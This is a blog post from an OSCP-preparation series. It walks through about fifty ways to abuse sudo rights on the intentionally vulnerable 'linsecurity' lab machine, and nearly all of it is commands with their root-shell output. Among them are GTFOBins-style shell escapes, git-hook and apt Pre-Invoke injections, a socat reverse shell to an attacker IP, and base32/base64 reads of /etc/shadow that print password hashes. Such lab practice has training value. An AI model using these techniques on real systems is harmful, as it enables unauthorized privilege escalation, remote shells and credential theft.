RoadToOSCP: LIN_SECURTY -PRIVILEGE-SCALATION - 50 of 100 WAYS- SUDO challenge

PRIVILEGE ESCALATION SUDO

1. ASH:

bob@linsecurity:~$ sudo ash

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# ^C

# exit

2. AWK:

bob@linsecurity:~$ sudo awk 'BEGIN {system("/bin/sh")}'

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# ^C

# exit

3. BASH

bob@linsecurity:~$ sudo /bin/bash

root@linsecurity:~# whoami

root

root@linsecurity:~# id

uid=0(root) gid=0(root) groups=0(root)

root@linsecurity:~# exit

exit

4. CSH:

bob@linsecurity:~$ sudo /bin/csh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# exit

5. DASH:

bob@linsecurity:~$ sudo /bin/dash

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

6. ED:

bob@linsecurity:~$ sudo /bin/ed

!/bin/sh

# whomai

/bin/sh: 1: whomai: not found

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

7. ENV:

bob@linsecurity:~$ sudo /usr/bin/env /bin/sh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

8. EXPECT:

sudo /usr/bin/expect -c 'spawn /bin/sh; interact'

[sudo] password for bob:

spawn /bin/sh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

9. FIND:

bob@linsecurity:~$ sudo find . -exec /bin/sh \; -quit

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

10. FTP:

bob@linsecurity:~$ sudo ftp

ftp> !/bin/sh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

11. LESS:

bob@linsecurity:~$ sudo /usr/bin/less /etc/profile (write at the end of file !/bin/sh)

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

12. MAN:

bob@linsecurity:~$ sudo /usr/bin/man man (write at the end of file !/bin/sh)

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

13. MORE:

bob@linsecurity:~$ TERM= sudo more /etc/profile

[sudo] password for bob:

# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))

# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "${PS1-}" ]; then

if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then

# The file bash.bashrc already sets the default PS1.

# PS1='\h:\w\$ '

if [ -f /etc/bash.bashrc ]; then

. /etc/bash.bashrc

else

if [ "`id -u`" -eq 0 ]; then

PS1='# '

else

PS1='$ '

if [ -d /etc/profile.d ]; then

for i in /etc/profile.d/*.sh; do

if [ -r $i ]; then

. $i

!/bin/sh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

14. SCP:

bob@linsecurity:~$ TF=$(mktemp)

bob@linsecurity:~$ echo 'sh 0<&2 1>&2' > $TF

bob@linsecurity:~$ chmod +x "$TF"

bob@linsecurity:~$ sudo scp -S $TF x y:

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

15. SOCAT:

bob@linsecurity:~$ RHOST=192.168.1.34

bob@linsecurity:~$ RPORT=12345

bob@linsecurity:~$ /usr/bin/socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345

/bin/sh: 0: can't access tty; job control turned off

$ whoami

bob

$ id

uid=1000(bob) gid=1004(bob) groups=1004(bob)

16. SSH:

bob@linsecurity:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

17. VI:

sudo /usr/bin/vi .

:!/bin/sh

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

18. ZSH:

bob@linsecurity:~$ sudo /usr/bin/zsh

linsecurity# whoami

root

linsecurity# id

uid=0(root) gid=0(root) groups=0(root)

linsecurity#

17. PICO (Not validate):

sudo pico
^R^X
reset; sh 1>&0 2>&0

18. RVIM:

bob@linsecurity:~$ sudo /usr/bin/rvim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

19. PERL:

bob@linsecurity:~$ sudo perl -e 'exec "/bin/sh";'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

20.TCLSH

bob@linsecurity:~$ sudo /usr/bin/tclsh
% 
exec /bin/sh <@stdin >@stdout 2>@stderr% 
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

21.GIT: 1

bob@linsecurity:~$ sudo git -p help config

!/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

22. GIT: 2

bob@linsecurity:~$ sudo git branch --help config
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 


23. GIT: 3

bob@linsecurity:~$ sudo git config --global user.email "test@test"
bob@linsecurity:~$ sudo git config --global user.name "test@test"

bob@linsecurity:~$ TF=$(mktemp -d)
bob@linsecurity:~$ git init "$TF"
Initialized empty Git repository in /tmp/tmp.7NvZuCf2bk/.git/
bob@linsecurity:~$ echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
bob@linsecurity:~$ mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
bob@linsecurity:~$ sudo git -C "$TF" commit --allow-empty -m x


bob@linsecurity:~$ sudo git -C "$TF" commit --allow-empty -m x
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#

24. GIT: 4

bob@linsecurity:~$ TF=$(mktemp -d)

bob@linsecurity:~$ ln -s /bin/sh "$TF/git-x"

bob@linsecurity:~$ sudo git "--exec-path=$TF" x

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

25. SCRIPT:

bob@linsecurity:~$ sudo script -q /dev/null

root@linsecurity:~# whoami

root

root@linsecurity:~# id

uid=0(root) gid=0(root) groups=0(root)

root@linsecurity:~#

26. AR:

TF=$(mktemp -u)
LFILE=file_to_read
sudo ar r "$TF" "$LFILE"
cat "$TF"

27. APT: 1

bob@linsecurity:~$ sudo apt-get changelog apt
Get:1 https://changelogs.ubuntu.com apt 1.6.14 Changelog [452 kB]
Fetched 452 kB in 1s (451 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#

28. APT: 2

bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
bob@linsecurity:~$ sudo apt install -c $TF sl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfile-copy-recursive-perl linux-headers-4.15.0-20 linux-headers-4.15.0-20-generic linux-image-4.15.0-20-generic linux-modules-4.15.0-20-generic
  linux-modules-extra-4.15.0-20-generic tcpd update-inetd
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  sl
0 upgraded, 1 newly installed, 0 to remove and 144 not upgraded.
Need to get 26.4 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu bionic/universe amd64 sl amd64 3.03-17build2 [26.4 kB]
Fetched 26.4 kB in 0s (172 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

29 APT: 3

bob@linsecurity:~$ sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 


30. APT-GET: 1

bob@linsecurity:~$ sudo apt-get changelog apt
Get:1 https://changelogs.ubuntu.com apt 1.6.14 Changelog [452 kB]
Fetched 452 kB in 1s (489 kB/s)
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

31. APT-GET: 2

bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
bob@linsecurity:~$ sudo apt-get install -c $TF sl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfile-copy-recursive-perl linux-headers-4.15.0-20 linux-headers-4.15.0-20-generic linux-image-4.15.0-20-generic linux-modules-4.15.0-20-generic
  linux-modules-extra-4.15.0-20-generic tcpd update-inetd
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  sl
0 upgraded, 1 newly installed, 0 to remove and 144 not upgraded.
Need to get 0 B/26.4 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
E: Problem executing scripts DPkg::Pre-Invoke '/bin/sh;false'
E: Sub-process returned an error code


32. APT-GET: 3

bob@linsecurity:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami 
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
Hit:1 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:2 http://archive.ubuntu.com/ubuntu bionic InRelease                                               
Hit:3 http://archive.ubuntu.com/ubuntu bionic-updates InRelease                                       
Get:4 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB]                           
Hit:5 http://security.ubuntu.com/ubuntu bionic-security InRelease                   
Fetched 74.6 kB in 0s (207 kB/s)                               
Reading package lists... Done


33. ARP:

bob@linsecurity:~$ LFILE=/etc/sudoers
bob@linsecurity:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> #
>> # This file MUST be edited with the 'visudo' command as root.
>> #
>> # Please consider adding local content in /etc/sudoers.d/ instead of
>> # directly modifying this file.
>> #
>> # See the man page for details on how to write a sudoers file.
>> #
>> Defaults  env_reset
Defaults: Host name lookup failure
arp: cannot set entry on line 9 of etherfile /etc/sudoers !
>> Defaults  mail_badpass
Defaults: Host name lookup failure
arp: cannot set entry on line 10 of etherfile /etc/sudoers !
>> Defaults  secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults: Host name lookup failure
arp: cannot set entry on line 11 of etherfile /etc/sudoers !
>> 
>> # Host alias specification
>> 
>> # User alias specification
>> 
>> # Cmnd alias specification
>> Cmnd_Alias STRACE = /usr/bin/strace
Cmnd_Alias: Host name lookup failure
arp: cannot set entry on line 18 of etherfile /etc/sudoers !
>> Cmnd_Alias ALLTHETHINGS = /bin/su, /usr/bin/apt, /usr/bin/apt-get, /usr/bin/ar, /usr/sbin/arp, /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
Cmnd_Alias: Host name lookup failure


34. SU:

bob@linsecurity:~$ sudo su
root@linsecurity:/home/bob# whoami
root
root@linsecurity:/home/bob# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:/home/bob# 

35. AT:

bob@linsecurity:~$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 1 at Wed Sep  1 16:21:00 2021
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 

36. BASE32:

bob@linsecurity:~$ LFILE=/etc/shadow
bob@linsecurity:~$ sudo base32 "$LFILE" | base32 --decode
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::


37. BASE64:

bob@linsecurity:~$ LFILE=/etc/shadow
bob@linsecurity:~$ sudo base64 "$LFILE" | base64 --decode
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::


38. STRACE:

bob@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 


39. BRIDGE:

root@linsecurity:/home/bob# echo mysecretdata > test
root@linsecurity:/home/bob# exit
exit
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo bridge -b "$LFILE"
Object "mysecretdata" is unknown, try "bridge help".
Command failed test:1
bob@linsecurity:~$ 


40. BUSCTL:

sudo busctl --show-machine
!/bin/sh

41. BUSYBOX:
bob@linsecurity:~$ sudo busybox sh


BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3.3) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/bob # whoami
root
/home/bob # id
uid=0(root) gid=0(root) groups=0(root)
/home/bob # 


42. C89:

bob@linsecurity:~$ sudo c89 -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
# ^C
# 


43. C99:

bob@linsecurity:~$ sudo c99 -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 


44. CAPSH:

bob@linsecurity:~$ sudo capsh --
root@linsecurity:~# whoami
root
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

45. CAT:

bob@linsecurity:~$ ls -ltrh test
-rw-r--r-- 1 root root 13 Sep  1 16:32 test
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo cat $LFILE
mysecretdata
bob@linsecurity:~$ 


46. CHMOD:

bob@linsecurity:~$ ls -ltrh test
-rw-r--r-- 1 root root 13 Sep  1 16:32 test
bob@linsecurity:~$ LFILE=test
bob@linsecurity:~$ sudo chmod 6777 $LFILE
bob@linsecurity:~$ cat $LFILE
mysecretdata
bob@linsecurity:~$ echo "more data " >>test
bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 root root 24 Sep  1 16:43 test


47. CHOWN:

bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 root root 24 Sep  1 16:43 test
bob@linsecurity:~$ sudo chown $(id -un):$(id -gn) $LFILE
bob@linsecurity:~$ ls -ltrh test
-rwxrwxrwx 1 bob bob 24 Sep  1 16:43 test


48. CHROOT:

bob@linsecurity:~$ sudo chroot /
root@linsecurity:/# whoami
root
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)


49. CMP:


bob@linsecurity:~$ ls -ltrh file_root 
-rw-r--r-- 1 root root 5 Sep  1 16:47 file_root
bob@linsecurity:~$ LFILE=file_root
bob@linsecurity:~$ sudo cmp $LFILE /dev/zero -b -l
1 150 h      0 ^@
2 141 a      0 ^@
3 162 r      0 ^@
4 144 d      0 ^@
5  12 ^J     0 ^@
cmp: EOF on file_root after byte 5
bob@linsecurity:~$ sudo cat $LFILE
hard

50. COLUMN:

bob@linsecurity:~$ ls -ltrh $LFILE
-rw-r--r-- 1 root root 5 Sep  1 16:47 file_root
bob@linsecurity:~$ sudo column $LFILE
hard
bob@linsecurity:~$

RoadToOSCP

Total Pageviews

Wednesday, September 1, 2021

LIN_SECURTY -PRIVILEGE-SCALATION - 50 of 100 WAYS- SUDO challenge - SERIES[I]

No comments:

Post a Comment

Mi primera experiencia en una conferencia:

Report Abuse